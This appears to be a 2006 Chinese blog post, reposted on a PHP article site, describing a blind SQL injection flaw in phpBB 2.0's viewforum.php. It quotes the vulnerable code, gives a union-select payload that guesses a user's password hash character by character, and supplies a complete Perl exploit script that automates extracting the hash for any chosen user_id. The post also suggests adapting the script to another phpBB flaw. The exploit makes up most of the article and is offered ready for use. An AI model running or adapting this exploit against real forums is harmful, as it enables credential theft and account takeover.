php注入实例


Posted in PHP onOctober 09, 2006

php注入实例 在网上很难看到一篇完整的关于php注入的文章和利用代码,于是我自已把mysql和php硬啃了几个星期,下面说说我的休会吧,希望能抛砖引玉!
相信大家对asp的注入已经是十分熟悉了,而对php的注入比asp要困难,因为php的magic_gpc选项确实让人头疼,在注入中不要出现引号,而php大多和mysql结合,而mysql的功能上的缺点,从另外一人角度看确在一定程度上防止了sql njection的攻击,我在这里就举一个实例吧,我以phpbb2.0为例:
在viewforum.php中有一个变量没过滤:
if ( isset($HTTP_GET_VARS<pOST_FORUM_URL]) ││ isset($HTTP_POST_VARS<pOST_FORUM_URL]) )
{
$forum_id = ( isset($HTTP_GET_VARS<pOST_FORUM_URL]) ) ? intval($HTTP_GET_VARS<pOST_FORUM_URL]): intval

($HTTP_POST_VARS<pOST_FORUM_URL]);
}
else if ( isset($HTTP_GET_VARS['forum']))
{
$forum_id = $HTTP_GET_VARS['forum'];
}
else
{
$forum_id = '';
}
就是这个forum,而下面直接把它放进了查询中:
if ( !empty($forum_id) )
{
$sql = "SELECT *
FROM " . FORUMS_TABLE . "
WHERE forum_id = $forum_id";
if ( !($result = $db->sql_query($sql)) )
{
message_die(GENERAL_ERROR, 'Could not obtain forums information', '', __LINE__, __FILE__, $sql);
}
}
else
{
message_die(GENERAL_MESSAGE, 'Forum_not_exist');
}

如果是asp的话,相信很多人都会注入了.如果这个forum_id指定的论坛不存在的话,就会使$result为空,于是返回Could not obtain forums information的信息,于是下面的代码就不能执行下去了
//
// If the query doesn't return any rows this isn't a valid forum. Inform
// the user.
//
if ( !($forum_row = $db->sql_fetchrow($result)) )
{
message_die(GENERAL_MESSAGE, 'Forum_not_exist');
}

//
// Start session management
//
$userdata = session_pagestart($user_ip, $forum_id) /****************************************

关键就是打星号的那一行了,这里是一个函数session_pagestart($user_ip, $thispage_id),这是在session.php中定义的一个函数,由于代码太

长,就不全贴出来了,有兴趣的可以自已看看,关键是这个函数还调用了session_begin(),函数调用如下session_begin($user_id, $user_ip,

$thispage_id, TRUE)),同样是在这个文件中定义的,其中有如下代码
$sql = "UPDATE " . SESSIONS_TABLE . "
SET session_user_id = $user_id, session_start = $current_time, session_time = $current_time, session_page =

$page_id, session_logged_in = $login
WHERE session_id = '" . $session_id . "'
AND session_ip = '$user_ip'";
if ( !($result = $db->sql_query($sql)) ││ !$db->sql_affectedrows() )
{
$session_id = md5(uniqid($user_ip));

$sql = "INSERT INTO " . SESSIONS_TABLE . "
(session_id, session_user_id, session_start, session_time, session_ip, session_page,

session_logged_in)
VALUES ('$session_id', $user_id, $current_time, $current_time, '$user_ip', $page_id, $login)";
if ( !($result = $db->sql_query($sql)) )
{
message_die(CRITICAL_ERROR, 'Error creating new session : session_begin', '', __LINE__, __FILE__,

$sql);
}

在这里有个session_page在mysql中定义的是个整形数,他的??$page_id,也就是$forum_id,如果插入的不是整形就会报错了,就会出现Error

creating new session : session_begin的提示,所以要指这$forum_id的值很重要,所以我把它指定为:-1%20union%20select%201,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1%20from%20phpbb_users%20where%20user_id=2%20and%20ord(substring(user_password,1,1))=57,没有引号吧!虽然指定的是一个不存在的forum_id但他返回的查询结果可不一定是为空,这个就是猜user_id为2的用户的第一位密码的ascii码值是是否为57,如果是的话文章中第一段代码中的$result可不为空了,于是就执行了ession_pagestart这个有问题的函数,插入的不是整数当然就要出错了,于是就显示Error creating new session : session_begin,就表明你猜对了第一位了,其它位类似.

如果没有这句出错信息的话我想即使注入成功也很难判断是否已经成功,看来出错信息也很有帮助啊.分析就到这里,下面附上一段测试代码,这段代码只要稍加修改就能适用于其它类似的猜md5密码的情况,这里我用的英文版的返回条件,中文和其它语言的只要改一下返回条件就行了.

use HTTP::Request::Common;
use HTTP::Response;
use LWP::UserAgent;
$ua = new LWP::UserAgent;

print " ***********************n";
print " phpbb viewforum.php expn";
print " code by pinkeyesn";
print " www.icehack.comn";
print " ************************n";
print "please enter the weak file's url:n";
print "e.g. http://192.168.1.4/phpBB2/viewforum.phpn";
$adr=<STDIN>;
chomp($adr);
print "please enter the user_id that you want to crackn";
$u=<STDIN>;
chomp($u);
print "work starting,please wait!n";
@pink=(48..57);
@pink=(@pink,97..102);
for($j=1;$j<=32;$j++){
for ($i=0;$i<@pink;$i++){
$url=$adr."?forum=-1%20union%20select%201,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1%20from%20phpbb_users%20where%

20user_id=$u%20and%20ord(substring(user_password,$j,1))=$pink[$i]";
$request = HTTP::Request->new('GET', "$url");
$response = $ua->request($request);

if ($response->is_success) {
if ($response->content =~ /Error creating new session/) {
$pwd.=chr($pink[$i]);
print "$pwdn";
}

}
}
}
if ($pwd ne ""){
print "successfully,The password is $pwd,good luckn";}
else{
print "bad luck,work failed!n";}

至于最近的phpbb2.0.6的search.php的问题利用程序只要将上面代码稍加修改就行了,如要错误请上www.icehack.com指正.

PHP 相关文章推荐
ftp类(myftp.php)
Oct 09 PHP
一个php作的文本留言本的例子(四)
Oct 09 PHP
isset和empty的区别
Jan 15 PHP
PHP中动态显示签名和ip原理
Mar 28 PHP
php visitFile()遍历指定文件夹函数
Aug 21 PHP
php图片加中文水印实现代码分享
Oct 31 PHP
php字符编码转换之gb2312转为utf8
Oct 28 PHP
解读PHP中的垃圾回收机制
Aug 10 PHP
PHP面向对象详解(三)
Dec 07 PHP
PHP MSSQL 分页实例
Apr 13 PHP
PHP中使用OpenSSL生成证书及加密解密
Feb 05 PHP
PHP封装的XML简单操作类完整实例
Nov 13 PHP
967 个函式
Oct 09 #PHP
如何给phpadmin一个保护
Oct 09 #PHP
Search Engine Friendly的URL设计
Oct 09 #PHP
PHPlet在Windows下的安装
Oct 09 #PHP
一棵php的类树(支持无限分类)
Oct 09 #PHP
基于PHP+MySQL的聊天室设计
Oct 09 #PHP
Win9x/ME下Apache+PHP安装配置
Oct 09 #PHP
You might like
apache2.2.4+mysql5.0.77+php5.2.8安装精简
2009/04/29 PHP
php 的加密函数 md5,crypt,base64_encode 等使用介绍
2012/04/09 PHP
php对csv文件的读取,写入,输出下载操作详解
2013/08/10 PHP
PHP获取远程图片并保存到本地的方法
2015/05/12 PHP
php实现mysql连接池效果实现代码
2018/01/25 PHP
PHP使用pdo连接access数据库并循环显示数据操作示例
2018/06/05 PHP
php如何获取Http请求
2020/04/30 PHP
jquery 实现密码框的显示与隐藏示例代码
2013/09/18 Javascript
js获取或设置当前窗口url参数的小例子
2013/10/14 Javascript
Javascript的&amp;&amp;和||的另类用法
2014/07/23 Javascript
jquery实现的鼠标下拉滚动置顶效果
2014/07/24 Javascript
jQuery网页版打砖块小游戏源码分享
2015/08/20 Javascript
jQuery实现简易的天天爱消除小游戏
2015/10/16 Javascript
详解nodejs中的process进程
2017/03/19 NodeJs
vue按需引入element Transfer 穿梭框
2017/09/30 Javascript
详解基于Vue+Koa的pm2配置
2017/10/24 Javascript
jQuery实现动态控制页面元素的方法分析
2017/12/20 jQuery
Angular脚手架开发的实现步骤
2019/04/09 Javascript
layer.open组件获取弹出层页面变量、函数的实例
2019/09/25 Javascript
vue el-tree 默认展开第一个节点的实现代码
2020/05/15 Javascript
javascript实现下拉菜单效果
2021/02/09 Javascript
[01:08:43]DOTA2-DPC中国联赛定级赛 Phoenix vs DLG BO3第一场 1月9日
2021/03/11 DOTA
Python字符串格式化
2015/06/15 Python
python获取url的返回信息方法
2018/12/17 Python
详解python校验SQL脚本命名规则
2019/03/22 Python
np.random.seed() 的使用详解
2020/01/14 Python
python 数据库查询返回list或tuple实例
2020/05/15 Python
英国最大的女士服装零售商:Bonmarché
2017/08/17 全球购物
解释i节点在文件系统中的作用
2013/11/26 面试题
城市规划毕业生求职信
2013/10/10 职场文书
人力资源经理的岗位职责范本
2014/02/28 职场文书
毕业证丢失证明范本
2014/09/20 职场文书
四风问题专项整治工作情况报告
2014/10/28 职场文书
信用卡工作证明范本
2015/06/19 职场文书
Docker与K8s关系介绍不会Docker也可以使用K8s
2022/06/25 Servers
win10电脑关机快捷键是哪个 win10快速关机的几种方法
2022/08/14 数码科技